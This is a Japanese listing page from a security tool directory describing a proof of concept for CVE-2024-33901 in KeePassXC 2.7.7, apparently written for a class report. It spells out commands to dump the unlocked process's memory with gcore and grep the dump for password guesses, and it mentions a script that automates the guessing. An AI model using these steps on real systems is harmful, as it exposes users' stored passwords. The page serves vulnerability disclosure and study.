Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/gmikisilva/cve-2024-33901-proofofconcept
パスワードクラッキングメモリフォレンジック脆弱性分析エクスプロイトデータ流出デジタルフォレンジック
GitHubgmikisilva/cve-2024-33901-proofofconcept

CVE-2024-33901-ProofOfConcept

脆弱性CVE-2024-33901を実証するKeePassXCバージョン2.7.7用の短いプログラム

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
261年前未レビュー

CVE-2024-33901-ProofOfConcept

KeePassXC バージョン 2.7.7 における脆弱性 CVE-2024-33901 を実証する短いプログラムです。

授業のレポートではソースコードへのリンクが必要になるかもしれないため、このリポジトリを作成しました。

脆弱性の再現方法

  1. KeePassXC を開き、データベースを認証します。
  2. データベースが認証されている間に、そのメモリダンプファイルを作成します。

これは PID を取得することで実現できます。次のコマンドで取得できます。

root@kitploit:~
ps aux | grep keepassxc

そして、次のコマンドを実行します: sudo gcore -o keepassxc_dump PID_HERE

例えば、取得した PID が 1234 の場合、コマンドは次のようになります。

root@kitploit:~
sudo gcore -o keepassxc_dump 1234

3. 最後に、次のコマンドを実行できます: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"

PID が 1234 の場合、コマンドは次のようになります。

root@kitploit:~
 cat keepassxc_dump.1234 | strings | grep "password guess here"

メモリダンプファイルが作成されると、データベースが再ロックされたり、KeePassXC が閉じられた後でも攻撃を実行できます。

提供されている Python コードはこれらの手順をすべて実行し、提供されたテキストファイルに基づいて複数のパスワード推測を試みます。

ツールをダウンロード